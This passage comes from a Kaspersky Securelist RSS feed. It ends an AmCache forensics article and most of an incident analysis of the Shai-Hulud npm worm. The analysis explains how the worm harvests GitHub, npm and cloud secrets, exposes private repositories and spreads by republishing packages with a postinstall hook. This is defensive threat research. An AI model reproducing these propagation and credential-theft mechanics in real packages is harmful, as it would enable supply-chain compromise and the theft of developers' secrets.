wp-image-117635" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170026/amcache-forensic-artifact12.png" alt="Checking program information by ProgramIds" width="1555" height="894" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170026/amcache-forensic-artifact12.png 1555w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170026/amcache-forensic-artifact12-300x172.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170026/amcache-forensic-artifact12-1024x589.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170026/amcache-forensic-artifact12-768x442.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170026/amcache-forensic-artifact12-1536x883.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170026/amcache-forensic-artifact12-609x350.png 609w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170026/amcache-forensic-artifact12-740x425.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170026/amcache-forensic-artifact12-487x280.png 487w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170026/amcache-forensic-artifact12-800x460.png 800w" sizes="auto, (max-width: 1555px) 100vw, 1555px" /></a><p id="caption-attachment-117635" class="wp-caption-text">Checking program information by ProgramIds</p></div><h4 id="inventorydriverbinary-use-case-example-catching-a-bad-driver">InventoryDriverBinary – use case example: catching a bad driver</h4><p>If the system was compromised through the abuse of a known vulnerable or malicious driver, you can use the <code>InventoryDriverBinary</code> registry key to confirm its presence. Even if the driver has been removed or hidden, remnants in this key can reveal that it was once loaded, which helps identify kernel-level compromises and supporting timeline reconstruction during the investigation. This is exactly how the <a href="https://securelist.com/av-killer-exploiting-throttlestop-sys/117026/" target="_blank" rel="noopener">AV Killer malware</a> was discovered.</p><h3 id="inventoryapplicationshortcut">InventoryApplicationShortcut</h3><p>This key contains entries for <code>.lnk</code> (shortcut) files that were present in folders like each user’s Start Menu or Desktop. Within each shortcut key, the ShortcutPath provides the absolute path to the LNK file at the moment of discovery. The <code>ShortcutTargetPath</code> shows where the shortcut pointed. We can also search for the <code>ProgramId</code> entry within the <code>InventoryApplication</code> key using the <code>ShortcutProgramId</code> (similar to what we did for drivers).</p><div id="attachment_117636" style="width: 1596px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170311/amcache-forensic-artifact13.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117636" class="size-full wp-image-117636" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170311/amcache-forensic-artifact13.png" alt="InventoryApplicationShortcut key" width="1586" height="306" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170311/amcache-forensic-artifact13.png 1586w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170311/amcache-forensic-artifact13-300x58.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170311/amcache-forensic-artifact13-1024x198.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170311/amcache-forensic-artifact13-768x148.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170311/amcache-forensic-artifact13-1536x296.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170311/amcache-forensic-artifact13-740x143.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170311/amcache-forensic-artifact13-1451x280.png 1451w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170311/amcache-forensic-artifact13-800x154.png 800w" sizes="auto, (max-width: 1586px) 100vw, 1586px" /></a><p id="caption-attachment-117636" class="wp-caption-text">InventoryApplicationShortcut key</p></div><h4 id="inventoryapplicationshortcut-use-case-example-confirming-use-of-a-removed-app">InventoryApplicationShortcut – use case example: confirming use of a removed app</h4><p>You find that a suspicious program was deleted from the computer, but the user claims they never ran it. The <code>InventoryApplicationShortcut</code> key shows a shortcut to that program was on their desktop and was accessed recently. With supplementary evidence, such as that from Prefetch analysis, you can confirm the execution of the software.</p><h2 id="amcache-key-comparison">AmCache key comparison</h2><p>The table below summarizes the information presented in the previous subsections, highlighting the main information about each AmCache key.</p><table><tbody><tr><td><strong>Key</strong></td><td><strong>Contains</strong></td><td><strong>Indicates execution?</strong></td></tr><tr><td>InventoryApplicationFile</td><td>Metadata for all executables seen on the system.</td><td>Possibly (presence = likely executed)</td></tr><tr><td>InventoryApplication</td><td>Metadata about formally installed software.</td><td>No (indicates installation, not necessarily execution)</td></tr><tr><td>InventoryDriverBinary</td><td>Metadata about loaded kernel-mode drivers.</td><td>Yes (driver was loaded into memory)</td></tr><tr><td>InventoryApplicationShortcut</td><td>Information about .lnk files.</td><td>Possibly (combine with other data for confirmation)</td></tr></tbody></table><h2 id="amcache-evilhunter">AmCache-EvilHunter</h2><p>Undoubtedly <code>Amcache.hve</code> is a very important forensic artifact. However, we could not find any tool that effectively parses its contents while providing threat intelligence for the analyst. With this in mind, we developed <a href="https://github.com/cristianzsh/amcache-evilhunter" target="_blank" rel="noopener">AmCache-EvilHunter</a> a command-line tool to parse and analyze Windows <code>Amcache.hve</code> registry hives, identify evidence of execution, suspicious executables, and integrate Kaspersky OpenTIP and VirusTotal lookups for enhanced threat intelligence.</p><p>AmCache-EvilHunter is capable of processing the <code>Amcache.hve</code> file and filter records by date range (with the options <code>--start</code> and <code>--end</code>). It is also possible to search records using keywords (<code>--search</code>), which is useful for searching for known naming conventions adopted by attackers. The results can be saved in CSV (<code>--csv</code>) or JSON (<code>--json</code>) formats.</p><p>The image below shows an example of execution of AmCache-EvilHunter with these basic options, by using the following command:</p><pre class="urvanov-syntax-highlighter-plain-tag">amcache-evilhunter -i Amcache.hve --start 2025-06-19 --end 2025-06-19 --csv output.csv</pre><p>The output contains all applications that were present on the machine on June 19, 2025. The last column contains information whether the file is an operating system component, or not.</p><div id="attachment_117638" style="width: 1352px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213455/amcache-forensic-artifact14.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117638" class="size-full wp-image-117638" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213455/amcache-forensic-artifact14.png" alt="Basic usage of AmCache-EvilHunter" width="1342" height="370" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213455/amcache-forensic-artifact14.png 1342w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213455/amcache-forensic-artifact14-300x83.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213455/amcache-forensic-artifact14-1024x282.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213455/amcache-forensic-artifact14-768x212.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213455/amcache-forensic-artifact14-1269x350.png 1269w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213455/amcache-forensic-artifact14-740x204.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213455/amcache-forensic-artifact14-1016x280.png 1016w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213455/amcache-forensic-artifact14-800x221.png 800w" sizes="auto, (max-width: 1342px) 100vw, 1342px" /></a><p id="caption-attachment-117638" class="wp-caption-text">Basic usage of AmCache-EvilHunter</p></div><div id="attachment_117639" style="width: 1350px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213535/amcache-forensic-artifact15.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117639" class="size-full wp-image-117639" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213535/amcache-forensic-artifact15.png" alt="CSV result" width="1340" height="268" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213535/amcache-forensic-artifact15.png 1340w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213535/amcache-forensic-artifact15-300x60.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213535/amcache-forensic-artifact15-1024x205.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213535/amcache-forensic-artifact15-768x154.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213535/amcache-forensic-artifact15-740x148.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213535/amcache-forensic-artifact15-800x160.png 800w" sizes="auto, (max-width: 1340px) 100vw, 1340px" /></a><p id="caption-attachment-117639" class="wp-caption-text">CSV result</p></div><p>Analysts are often faced with a large volume of executables and artifacts. To narrow down the scope and reduce noise, the tool is able to search for known suspicious binaries with the <code>--find-suspicious option</code>. The patterns used by the tool include common malware names, Windows processes containing small typos (e.g., <code>scvhost.exe</code>), legitimate executables usually found in use during incidents, one-letter/one-digit file names (such as <code>1.exe</code>, <code>a.exe</code>), or random hex strings. The figure below shows the results obtained by using this option; as highlighted, one <code>svchost.exe</code> file is part of the operating system and the other is not, making it a good candidate for collection and analysis if not deleted.</p><div id="attachment_117640" style="width: 1351px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213814/amcache-forensic-artifact16.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117640" class="size-full wp-image-117640" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213814/amcache-forensic-artifact16.png" alt="Suspicious files identification" width="1341" height="235" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213814/amcache-forensic-artifact16.png 1341w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213814/amcache-forensic-artifact16-300x53.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213814/amcache-forensic-artifact16-1024x179.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213814/amcache-forensic-artifact16-768x135.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213814/amcache-forensic-artifact16-740x130.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213814/amcache-forensic-artifact16-800x140.png 800w" sizes="auto, (max-width: 1341px) 100vw, 1341px" /></a><p id="caption-attachment-117640" class="wp-caption-text">Suspicious files identification</p></div><p>Malicious files usually do not include any publisher information and are definitely not part of the default operating system. For this reason, AmCache-EvilHunter also ships with the <code>--missing-publisher</code> and <code>--exclude-os options</code>. These parameters allow for easy filtering of suspicious binaries and also allow fast threat intelligence gathering, which is crucial during an incident.</p><p>Another important feature that distinguishes our tool from other proposed approaches is that AmCache-EvilHunter can query Kaspersky OpenTIP (<code>--opentip</code> ) and VirusTotal (<code>--vt</code>) for hashes it identifies. In this way, analysts can rapidly gain insights into samples to decide whether they are going to proceed with a full analysis of the artifact or not.</p><div id="attachment_117641" style="width: 1349px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213952/amcache-forensic-artifact17.jpeg" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117641" class="size-full wp-image-117641" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213952/amcache-forensic-artifact17.jpeg" alt="Threat intel lookup" width="1339" height="182" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213952/amcache-forensic-artifact17.jpeg 1339w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213952/amcache-forensic-artifact17-300x41.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213952/amcache-forensic-artifact17-1024x139.jpeg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213952/amcache-forensic-artifact17-768x104.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213952/amcache-forensic-artifact17-740x101.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213952/amcache-forensic-artifact17-800x109.jpeg 800w" sizes="auto, (max-width: 1339px) 100vw, 1339px" /></a><p id="caption-attachment-117641" class="wp-caption-text">Threat intel lookup</p></div><p>Binaries of the tool are available on <a href="https://github.com/cristianzsh/amcache-evilhunter/releases/" target="_blank" rel="noopener">our GitHub page</a> for both Linux and Windows systems.</p><h2 id="conclusion">Conclusion</h2><p><code>Amcache.hve</code> is a cornerstone of Windows forensics, capturing rich metadata, such as full paths, SHA-1 hashes, compilation timestamps, publisher and version details, for every executable that appears on a system. While it does not serve as a definitive execution log, its strength lies in documenting file presence and paths, making it invaluable for spotting anomalous binaries, verifying trustworthiness via hash lookups against threat‐intelligence feeds, and correlating <code>LinkDate</code> values with known attack campaigns.</p><p>To extract its full investigative potential, analysts should merge AmCache data with other artifacts (e.g., Prefetch, ShimCache, and Windows event logs) to confirm actual execution and build accurate timelines. Comparing <code>InventoryApplicationFile</code> entries against <code>InventoryApplication</code> reveals whether a file was merely dropped or formally installed, and identifying unexpected driver records can expose stealthy rootkits and persistence mechanisms. Leveraging parsers like AmCache-EvilHunter and cross-referencing against VirusTotal or proprietary threat databases allows IOC generation and robust incident response, making AmCache analysis a fundamental DFIR skill.</p>]]></content:encoded> <wfw:commentRss>https://securelist.com/amcache-forensic-artifact/117622/feed/</wfw:commentRss> <slash:comments>0</slash:comments> <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/01111328/SL-AmCache-forensic-artifact-featured.jpg" width="2000" height="955"><media:keywords>full</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/01111328/SL-AmCache-forensic-artifact-featured-1024x489.jpg" width="1024" height="489"><media:keywords>large</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/01111328/SL-AmCache-forensic-artifact-featured-300x143.jpg" width="300" height="143"><media:keywords>medium</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/01111328/SL-AmCache-forensic-artifact-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content> </item> <item> <title>Massive npm infection: the Shai-Hulud worm and patient zero</title> <link>https://securelist.com/shai-hulud-worm-infects-500-npm-packages-in-a-supply-chain-attack/117547/</link> <comments>https://securelist.com/shai-hulud-worm-infects-500-npm-packages-in-a-supply-chain-attack/117547/#respond</comments> <dc:creator><![CDATA[Vladimir Gursky, Dmitry Vinogradov]]></dc:creator> <pubDate>Thu, 25 Sep 2025 10:00:12 +0000</pubDate> <category><![CDATA[Incidents]]></category> <category><![CDATA[Malware descriptions]]></category> <category><![CDATA[Malware Technologies]]></category> <category><![CDATA[Linux]]></category> <category><![CDATA[Microsoft Windows]]></category> <category><![CDATA[JavaScript]]></category> <category><![CDATA[Apple MacOS]]></category> <category><![CDATA[Malware Descriptions]]></category> <category><![CDATA[Malware]]></category> <category><![CDATA[Worm]]></category> <category><![CDATA[Supply-chain attack]]></category> <category><![CDATA[Data theft]]></category> <category><![CDATA[Open source]]></category> <category><![CDATA[GitHub]]></category> <category><![CDATA[npm]]></category><category><![CDATA[Windows malware]]></category> <category><![CDATA[Unix and macOS malware]]></category> <category><![CDATA[Web threats]]></category> <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=117547</guid> <description><![CDATA[We dissect a recent incident where npm packages with millions of downloads were infected by the Shai-Hulud worm. Kaspersky experts describe the starting point for the source of the infection.]]></description> <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/25072805/shai-hulud-featured-image-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2><p>The modern development world is almost entirely dependent on third-party modules. While this certainly speeds up development, it also creates a massive attack surface for end users, since anyone can create these components. It is no surprise that malicious modules are becoming more common. When a single maintainer account for popular modules or a single popular dependency is compromised, it can quickly turn into a <a href="https://securelist.com/ksb-story-of-the-year-2024/114883/" target="_blank" rel="noopener">supply chain attack</a>. Such compromises are now a frequent attack vector trending among threat actors. In the last month alone, there have been two major incidents that confirm this interest in creating malicious modules, dependencies, and packages. We have already discussed the <a href="https://www.kaspersky.com/blog/npm-packages-trojanized/54280/" target="_blank" rel="noopener">recent compromise</a> of popular npm packages. September 16, 2025 saw <a href="https://www.kaspersky.com/blog/tinycolor-shai-hulud-supply-chain-attack/54315/" target="_blank" rel="noopener">reports</a> of a new wave of npm package infections, caused by the self-propagating malware known as Shai-Hulud.</p><p>Shai-Hulud is designed to steal sensitive data, expose private repositories of organizations, and hijack victim credentials to infect other packages and spread on. Over 500 packages were infected in this incident, including one with more than two million weekly downloads. As a result, developers who integrated these malicious packages into their projects risk losing sensitive data, and their own libraries could become infected with Shai-Hulud. This self-propagating malware takes over accounts and steals secrets to create new infected modules, spreading the threat along the dependency chain.</p><h2 id="technical-details">Technical details</h2><p>The worm’s malicious code executes when an infected package is installed. It then publishes infected releases to all packages the victim has update permissions for.</p><p>Once the infected package is installed from the npm registry on the victim’s system, a special command is automatically executed. This command launches a malicious script over 3 MB in size named <code>bundle.js</code>, which contains several legitimate, open-source work modules.</p><p>Key modules within <code>bundle.js</code> include:</p><ul><li>Library for interacting with AWS cloud services</li><li>GCP module that retrieves metadata from the Google Cloud Platform environment</li><li>Functions for <a href="https://github.com/trufflesecurity/trufflehog" target="_blank" rel="noopener">TruffleHog</a>, a tool for scanning various data sources to find sensitive information, specifically secrets</li><li>Tool for interacting with the GitHub API</li></ul><p>The JavaScript file also contains network utilities for data transfer and the main operational module, Shai-Hulud.</p><p>The worm begins its malicious activity by collecting information about the victim’s operating system and checking for an npm token and authenticated GitHub user token in the environment. If a valid GitHub token is not present, <code>bundle.js</code> will terminate. A distinctive feature of Shai-Hulud is that most of its functionality is geared toward Linux and macOS systems: almost all malicious actions are performed exclusively on these systems, with the exception of using TruffleHog to find secrets.</p><h3 id="exfiltrating-secrets">Exfiltrating secrets</h3><p>After passing the checks, the malware uses the token mentioned earlier to get information about the current GitHub user. It then runs the <code>extraction</code> function, which creates a temporary executable bash script at <code>/tmp/processor.sh</code> and runs it as a separate process, passing the token as an argument. Below is the <code>extraction</code> function, with strings and variable names modified for readability since the original source code was illegible.</p><div id="attachment_117553" style="width: 560px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155009/shai-hulud1.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117553" class="size-full wp-image-117553" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155009/shai-hulud1.png" alt="The extraction function, formatted for readability" width="550" height="533" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155009/shai-hulud1.png 550w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155009/shai-hulud1-300x291.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155009/shai-hulud1-361x350.png 361w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155009/shai-hulud1-289x280.png 289w" sizes="auto, (max-width: 550px) 100vw, 550px" /></a><p id="caption-attachment-117553" class="wp-caption-text">The extraction function, formatted for readability</p></div><p>The bash script is designed to communicate with the GitHub API and collect secrets from the victim’s repository in an unconventional way. First, the script checks if the token has the necessary permissions to create branches and work with GitHub Actions. If it does, the script gets a list of all the repositories the user can access from 2025. In each of these, it creates a new branch named <code>shai-hulud</code> and uploads a <code>shai-hulud-workflow.yml</code> <a href="https://docs.github.com/en/actions/concepts/workflows-and-actions/workflows" target="_blank" rel="noopener">workflow</a>, which is a configuration file for describing GitHub Actions workflows. These files are automation scripts that are triggered in GitHub Actions whenever changes are made to a repository. The Shai-Hulud workflow activates on every push.</p><div id="attachment_117554" style="width: 694px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155101/shai-hulud2.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117554" class="size-full wp-image-117554" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155101/shai-hulud2.png" alt="The malicious workflow configuration" width="684" height="233" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155101/shai-hulud2.png 684w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155101/shai-hulud2-300x102.png 300w" sizes="auto, (max-width: 684px) 100vw, 684px" /></a><p id="caption-attachment-117554" class="wp-caption-text">The malicious workflow configuration</p></div><p>This file collects secrets from the victim’s repositories and forwards them to the attackers’ server. Before being sent, the confidential data is encoded twice with Base64.</p><p>This unusual method for data collection is designed for a one-time extraction of secrets from a user’s repositories. However, it poses a threat not only to Shai-Hulud victims but also to ordinary researchers. If you search for “shai-hulud” on GitHub, you will find numerous repositories that have been compromised by the worm.</p><div id="attachment_117555" style="width: 1160px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155148/shai-hulud3.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117555" class="size-full wp-image-117555" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155148/shai-hulud3.png" alt="Open GitHub repositories compromised by Shai-Hulud" width="1150" height="756" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155148/shai-hulud3.png 1150w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155148/shai-hulud3-300x197.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155148/shai-hulud3-1024x673.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155148/shai-hulud3-768x505.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155148/shai-hulud3-532x350.png 532w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155148/shai-hulud3-740x486.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155148/shai-hulud3-426x280.png 426w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155148/shai-hulud3-800x526.png 800w" sizes="auto, (max-width: 1150px) 100vw, 1150px" /></a><p id="caption-attachment-117555" class="wp-caption-text">Open GitHub repositories compromised by Shai-Hulud</p></div><p>The main <code>bundle.js</code> script then requests a list of all organizations associated with the victim and runs the migration function for each one. This function also runs a bash script, but in this case, it saves it to <code>/tmp/migrate-repos.sh</code>, passing the organization name, username, and token as parameters for further malicious activity.</p><p>The bash script automates the migration of all private and internal repositories from the specified GitHub organization to the user’s account, making them public. The script also uses the GitHub API to copy the contents of the private repositories as <a href="https://docs.github.com/en/repositories/creating-and-managing-repositories/duplicating-a-repository" target="_blank" rel="noopener">mirrors</a>.</p><p>We believe these actions are intended for the automated theft of source code from the private repositories of popular communities and organizations. For example, the well-known company CrowdStrike was caught in this wave of infections.</p><h3 id="the-worms-self-replication">The worm’s self-replication</h3><p>After running operations on the victim’s GitHub, the main <code>bundle.js</code> script moves on to its next crucial stage: self-replication. First, the script gets a list of the victim’s 20 most downloaded packages. To do this, it performs a search query with the username from the previously obtained npm token:</p><pre class="urvanov-syntax-highlighter-plain-tag">https://registry.npmjs.org/-/v1/search?text=maintainer:{%user_details%}&size=20</pre><p> </p><p>Next, for each of the packages it finds, it calls the <code>updatePackage</code> function. This function first attempts to download the tarball version of the package (a <code>.TAR</code> archive). If it exists, a temporary directory named <code>npm-update-{target_package_name}</code> is created. The tarball version of the package is saved there as <code>package.tgz</code>, then unpacked and modified as follows:</p><ul><li>The malicious <code>bundle.js</code> is added to the original package.</li><li>A postinstall command is added to the <code>package.json</code> file (which is used in Node.js projects to manage dependencies and project metadata). This command is configured to execute the malicious script via <code>node bundle.js</code>.</li><li>The package version number is incremented by 1.</li></ul><p>The modified package is then re-packed and published to npm as a new version with the <code>npm publish</code> command. After this, the temporary directory for the package is cleared.</p><div id="attachment_117556" style="width: 687px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155303/shai-hulud4.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117556" class="size-full wp-image-117556" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155303/shai-hulud4.png" alt="The updatePackage function, formatted for readability" width="677" height="771" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155303/shai-hulud4.png 677w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155303/shai-hulud4-263x300.png 263w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155303/shai-hulud4-307x350.png 307w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155303/shai-hulud4-246x280.png 246w" sizes="auto, (max-width: 677px) 100vw, 677px" /></a><p id="caption-attachment-117556" class="wp-caption-text">The updatePackage function, formatted for readability</p></div><h3 id="uploading-secrets-to-github">Uploading secrets to GitHub</h3><p>Next, the worm uses the previously mentioned TruffleHog utility to harvest secrets from the target system. It downloads the latest version of the utility from the original repository for the specific operating system type using the following link:</p><pre class="urvanov-syntax-highlighter-plain-tag">https://github.com/trufflesecurity/trufflehog/releases/download/{utility version}/{OS-specific file}</pre><p> </p><p>The worm also uses modules for AWS and Google Cloud Platform (GCP) to scan for secrets. The script then aggregates the collected data into a single object and creates a repository named “Shai-Hulud” in the victim’s profile. It then uploads the collected information to this repository as a <code>data.json</code> file.</p><p>Below is a list of data formats collected from the victim’s system and uploaded to GitHub:</p><pre class="urvanov-syntax-highlighter-plain-tag">{ "application": { "name": "", "version": "", "description": "" }, "system": { "platform": "", "architecture": "", "platformDetailed": "", "architectureDetailed": "" }, "runtime": { "nodeVersion": "", "platform": "", "architecture": "", "timestamp": "" }, "environment": { }, "modules": { "github": { "authenticated": false, "token": "", "username": {} }, "aws": { "secrets": [] }, "gcp": { "secrets": [] }, "truffleHog": { "available": false, "installed": false, "version": "", "platform": "", "results": [ {} ] }, "npm": { "token": "", "authenticated": true, "username": "" } }}</pre><p><h3 id="infection-characteristics">Infection characteristics</h3><p>A distinctive characteristic of the modified packages is that they contain an archive named <code>package.tar</code>. This is worth noting because packages usually contain an archive with a name that matches the package itself.</p><p>Through our research, we were able to identify the first package from which Shai-Hulud began to spread, thanks to a key difference. As we mentioned earlier, after infection, a postinstall command to execute the malicious script, <code>node bundle.js</code>, is written to the <code>package.json</code> file. This command typically runs immediately after installation. However, we discovered that one of the infected packages listed the same command as a preinstall command, meaning it ran before the installation. This package was <strong>ngx-bootstrap version 18.1.4</strong>. We believe this was the starting point for the spread of this infection. This hypothesis is further supported by the fact that the archive name in the first infected version of this package differed from the name characteristic of later infected packages (<code>package.tar</code>).</p><p>While investigating different packages, we noticed that in some cases, a single package contained multiple versions with malicious code. This was likely possible because the infection spread to all maintainers and contributors of packages, and the malicious code was then introduced from each of their accounts.</p><h2 id="infected-libraries-and-crowdstrike">Infected libraries and CrowdStrike</h2><p>The rapidly spreading Shai-Hulud worm has infected many popular libraries that organizations and developers use daily. Shai-Hulud has infected over 500 popular packages in recent days, including libraries from the well-known company CrowdStrike.<br />Among the infected libraries were the following:</p><ul><li>@crowdstrike/commitlint versions 8.1.1, 8.1.2</li><li>@crowdstrike/falcon-shoelace versions 0.4.1, 0.4.2</li><li>@crowdstrike/foundry-js versions 0.19.1, 0.19.2</li><li>@crowdstrike/glide-core versions 0.34.2, 0.34.3</li><li>@crowdstrike/logscale-dashboard versions 1.205.1, 1.205.2</li><li>@crowdstrike/logscale-file-editor versions 1.205.1, 1.205.2</li><li>@crowdstrike/logscale-parser-edit versions 1.205.1, 1.205.2</li><li>@crowdstrike/logscale-search versions 1.205.1, 1.205.2</li><li>@crowdstrike/tailwind-toucan-base versions 5.0.1, 5.0.2</li></ul><p>But the event that has drawn significant attention to this spreading threat was the infection of the @ctrl/tinycolor library, which is downloaded by over two million users every week.</p><p>As mentioned above, the malicious script exposes an organization’s private repositories, posing a serious threat to their owners, as this creates a risk of exposing the source code of their libraries and products, among other things, and leading to an even greater loss of data.</p><h2 id="prevention-and-protection">Prevention and protection</h2><p>To protect against this type of infection, we recommend using a specialized solution for monitoring open-source components. Kaspersky maintains a <a href="https://www.kaspersky.com/open-source-feed?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______9cfe10194bda62de" target="_blank" rel="noopener">continuous feed of compromised packages and libraries</a>, which can be used to secure your supply chain and protect development from similar threats.</p><p>For personal devices, we recommend <a href="https://www.kaspersky.com/premium?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___kprem____311534b86c615e6e" target="_blank" rel="noopener">Kaspersky Premium</a>, which provides multi-layered protection to prevent and neutralize infection threats. Our solution can also restore the device’s functionality if it’s infected with malware.</p><p>For corporate devices, we advise implementing a comprehensive solution like <a 